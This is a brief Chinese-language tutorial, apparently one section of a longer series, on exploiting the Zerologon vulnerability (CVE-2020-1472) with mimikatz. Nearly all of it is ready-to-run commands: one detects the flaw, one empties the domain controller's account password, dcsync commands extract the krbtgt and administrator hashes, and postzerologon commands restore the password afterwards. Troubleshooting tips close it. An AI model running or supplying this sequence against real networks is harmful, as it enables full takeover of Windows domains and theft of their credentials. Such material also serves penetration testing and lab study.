利用mimikatz利用cve2020-1472
原理在上一节说了,本章不多提,主要介绍mimikatz利用方式
检测目标机是否存在cve2020-1472
lsadump::zerologon /target:域控IP /account:域控主机名$
lsadump::zerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$
清空域控密码
lsadump::zerologon /target:域控IP /account:域控主机名$ /exploit
lsadump::zerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$ /exploit
获取目标机的HASH
lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
注意:本地测试需要将DNS指向域控
lsadump::dcsync /domain:abc.com /dc:DC.abc.com /user:administrator /authuser:WIN-H06K3JJM9AO$ /authdomain:abc.com /authpassword:"" /authntlm
恢复密码
lsadump::postzerologon /target:dc.de1ay.com /account:dc$
lsadump::postzerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$
注:mimikatz在读取域内HASH的时候需要配置DNS 指向域控 /dc: win08.test.com 这里填写域控的完整的名字 ; 输入参数都正确的情况还获取不了, 重启AD服务 在恢复密码的时候注意先去运行privilege::debug